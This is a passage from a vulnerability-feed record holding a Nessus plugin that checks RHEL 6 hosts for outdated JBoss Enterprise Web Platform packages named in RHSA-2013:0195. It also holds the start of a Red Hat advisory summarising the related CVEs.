value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-tomcat6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-federation\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-idp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-pdp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-sts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:resteasy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:resteasy-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:resteasy-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:resteasy-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rh-ewp-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rh-ewp-docs-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-ant-bundle-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-common-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-client-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-comm-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-dbutils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-domain\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-native-system\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-plugin-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-plugin-container\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-plugindoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-util\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-filetemplate-bundle-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-helpers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-jboss-as-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-jmx-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-modules-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-platform-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-plugin-validator\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-pluginAnnotations\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-pluginGen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-plugins-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-rtfilter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-agent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-all\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-aop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-beans\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-context\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:wss4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xerces-j2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xerces-j2-scripts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.1-apis\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.2-apis\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.3-apis\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver10\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver12\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-which10\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-which11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-security\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/08/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2013:0195\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n\n if (! (rpm_exists(release:\"RHEL6\", rpm:\"jboss-seam2-\")) || rpm_exists(rpm:\"jbossas-welcome-content-eap\")) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"JBoss EWP\");\n\n if (rpm_check(release:\"RHEL6\", reference:\"aopalliance-1.0-5.3.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"apache-cxf-2.2.12-6.1.patch_04.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"bsh2-2.0-0.b4.15.patch01.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"bsh2-bsf-2.0-0.b4.15.patch01.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"glassfish-jaxb-2.1.12-12_patch_03.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"google-guice-2.0-3.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"hibernate3-3.3.2-1.9.GA_CP05.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"hibernate3-annotations-3.4.0-3.6.GA_CP05.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"hibernate3-annotations-javadoc-3.4.0-3.6.GA_CP05.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"hibernate3-entitymanager-3.4.0-4.5.GA_CP05.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"hibernate3-entitymanager-javadoc-3.4.0-4.5.GA_CP05.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"hibernate3-javadoc-3.3.2-1.9.GA_CP05.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"hibernate3-search-3.1.1-2.5.GA_CP05.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"hibernate3-search-javadoc-3.1.1-2.5.GA_CP05.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"hsqldb-1.8.0.10-11_patch_01.1.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jacorb-jboss-2.3.2-2.jboss_1.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"javassist-3.12.0-6.SP1.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-aop2-2.1.6-5.CP06.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-bootstrap-1.0.2-1.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-cache-core-3.2.11-1.GA.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-cache-pojo-3.0.1-1.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-cl-2.0.11-4.GA.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-cluster-ha-server-api-1.2.1-2.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-common-beans-1.0.1-2.Final.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-common-core-2.2.21-1.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i386\", reference:\"jboss-eap5-native-5.2.0-6.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"jboss-eap5-native-5.2.0-6.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-ejb-3.0-api-5.0.2-2.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-ejb3-cache-1.0.0-4.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-ejb3-core-1.3.9-0.4.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-ejb3-ext-api-1.0.0-4.1.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-ejb3-ext-api-impl-1.0.0-3.7.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-ejb3-interceptors-1.0.9-0.2.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-ejb3-metadata-1.0.0-3.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-ejb3-metrics-deployer-1.1.1-0.1.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-ejb3-security-1.0.2-0.5.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-ejb3-timeout-0.1.1-0.8.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-ejb3-timeout-3.0-api-0.1.1-0.8.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-ejb3-timeout-spi-0.1.1-0.8.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-ejb3-transactions-1.0.2-1.6.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-jacc-1.1-api-5.0.2-2.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-jad-1.2-api-5.0.2-2.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-jaspi-1.0-api-5.0.2-2.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-javaee-5.0.2-2.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-javaee-poms-5.0.2-2.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-jaxrpc-api_1.1_spec-1.0.0-16.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-jca-1.5-api-5.0.2-2.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-jms-1.1-api-5.0.2-2.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-jpa-deployers-1.0.0-6.SP2.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-logmanager-1.1.2-6.GA_patch_01.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-naming-5.0.3-5.CP02.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-reflect-2.0.4-2.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-remoting-2.5.4-10.SP4.1.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-seam2-2.2.6.EAP5-14.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-seam2-docs-2.2.6.EAP5-14.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-seam2-examples-2.2.6.EAP5-14.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-seam2-runtime-2.2.6.EAP5-14.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-security-negotiation-2.1.3-1.GA.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-security-spi-2.0.5-4.SP3_1.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-transaction-1.0.1-api-5.0.2-2.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-vfs2-2.2.1-4.GA.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbossas-web-5.2.0-16.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbossas-web-client-5.2.0-16.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbossas-web-tp-licenses-5.2.0-8.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbossas-web-ws-native-5.2.0-16.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbossas-ws-cxf-ewp-5.2.0-11.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbosssx2-2.0.5-8.3.SP3_1.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbossts-4.6.1-12.CP13.7.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbossts-javadoc-4.6.1-12.CP13.7.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbossweb-2.1.13-2_patch_01.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbossweb-el-1.0-api-2.1.13-2_patch_01.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbossweb-jsp-2.1-api-2.1.13-2_patch_01.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbossweb-lib-2.1.13-2_patch_01.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbossweb-servlet-2.5-api-2.1.13-2_patch_01.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbossws-3.1.2-13.SP15_patch_01.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbossws-common-1.1.0-9.SP10.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbossws-framework-3.1.2-9.SP13.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbossws-spi-1.1.2-6.SP8.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jgroups-2.6.22-1.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jopr-embedded-1.3.4-19.SP6.9.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jopr-hibernate-plugin-3.0.0-14.EmbJopr5.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jopr-jboss-as-5-plugin-3.0.0-16.EmbJopr5.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jopr-jboss-cache-v3-plugin-3.0.0-15.EmbJopr5.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"mod_cluster-demo-1.0.10-12.2.GA_CP04.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"mod_cluster-jbossas-1.0.10-12.2.GA_CP04.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"mod_cluster-jbossweb2-1.0.10-12.2.GA_CP04.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i386\", reference:\"mod_cluster-native-1.0.10-10.GA_CP04_patch01.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"mod_cluster-native-1.0.10-10.GA_CP04_patch01.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"mod_cluster-tomcat6-1.0.10-12.2.GA_CP04.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"picketlink-federation-2.1.5-3.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"picketlink-quickstarts-2.1.5-1.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"picketlink-quickstarts-idp-2.1.5-1.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"picketlink-quickstarts-pdp-2.1.5-1.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"picketlink-quickstarts-sts-2.1.5-1.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"resteasy-1.2.1-17.CP02_patch02.1.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"resteasy-examples-1.2.1-17.CP02_patch02.1.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"resteasy-javadoc-1.2.1-17.CP02_patch02.1.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"resteasy-manual-1.2.1-17.CP02_patch02.1.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"rh-ewp-docs-5.2.0-11.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"rh-ewp-docs-examples-5.2.0-11.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"rhq-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"rhq-ant-bundle-common-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"rhq-common-parent-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"rhq-core-client-api-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"rhq-core-comm-api-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"rhq-core-dbutils-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"rhq-core-domain-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"rhq-core-gui-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"rhq-core-native-system-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"rhq-core-parent-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"rhq-core-plugin-api-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"rhq-core-plugin-container-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"rhq-core-plugindoc-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"rhq-core-util-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"rhq-filetemplate-bundle-common-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"rhq-helpers-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"rhq-jboss-as-common-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"rhq-jmx-plugin-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"rhq-modules-parent-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"rhq-parent-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"rhq-platform-plugin-3.0.0-14.EmbJopr5.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"rhq-plugin-validator-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"rhq-pluginAnnotations-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"rhq-pluginGen-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"rhq-plugins-parent-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"rhq-rtfilter-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"spring2-2.5.6-9.SEC03.1.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"spring2-agent-2.5.6-9.SEC03.1.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"spring2-all-2.5.6-9.SEC03.1.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"spring2-aop-2.5.6-9.SEC03.1.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"spring2-beans-2.5.6-9.SEC03.1.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"spring2-context-2.5.6-9.SEC03.1.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"spring2-core-2.5.6-9.SEC03.1.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"wss4j-1.5.12-4_patch_02.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"xerces-j2-2.9.1-10.patch02.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"xerces-j2-scripts-2.9.1-10.patch02.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"xml-commons-1.3.04-8.2_patch_01.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"xml-commons-jaxp-1.1-apis-1.3.04-8.2_patch_01.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"xml-commons-jaxp-1.2-apis-1.3.04-8.2_patch_01.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"xml-commons-jaxp-1.3-apis-1.3.04-8.2_patch_01.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"xml-commons-resolver10-1.3.04-8.2_patch_01.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"xml-commons-resolver11-1.3.04-8.2_patch_01.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"xml-commons-resolver12-1.3.04-8.2_patch_01.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"xml-commons-which10-1.3.04-8.2_patch_01.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"xml-commons-which11-1.3.04-8.2_patch_01.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"xml-security-1.5.1-2.ep5.el6\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"aopalliance / apache-cxf / bsh2 / bsh2-bsf / glassfish-jaxb / etc\");\n }\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:47:57", "description": "Updated JBoss Enterprise Web Platform 5.2.0 packages that fix multiple security issues, various bugs, and add several enhancements are now available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThis JBoss Enterprise Web Platform 5.2.0 release serves as a replacement for JBoss Enterprise Web Platform 5.1.2, and includes bug fixes and enhancements. As JBoss Enterprise Web Platform is a subset of JBoss Enterprise Application Platform, refer to the JBoss Enterprise Application Platform 5.2.0 Release Notes for information on the most significant of these changes. The Release Notes will be available shortly from https://access.redhat.com/knowledge/docs/\n\nAn attack technique against the W3C XML Encryption Standard when block ciphers were used in CBC mode could allow a remote attacker to conduct chosen-ciphertext attacks, leading to the recovery of the entire plain text of a particular cryptogram. (CVE-2011-1096)\n\nJBoss Web Services leaked side-channel data when distributing symmetric keys (for XML encryption), allowing a remote attacker to recover the entire plain text form of a symmetric key. (CVE-2011-2487)\n\nSpring framework could possibly evaluate Expression Language (EL) expressions twice, allowing a remote attacker to execute arbitrary code in the context of the application server, or to obtain sensitive information from the server. Manual action is required to apply this fix. Refer to the Solution section. (CVE-2011-2730)\n\nApache CXF checked to ensure XML elements were signed or encrypted by a Supporting Token, but not whether the correct token was used. A remote attacker could transmit confidential information without the appropriate security, and potentially circumvent access controls on web services exposed via Apache CXF. Refer to the Solution section for details. (CVE-2012-2379)\n\nWhen an application used FORM authentication, along with another component that calls request.setUserPrincipal() before the call to FormAuthenticator# authenticate() (such as the Single-Sign-On valve), it was possible to bypass the security constraint checks in the FORM authenticator by appending '/ 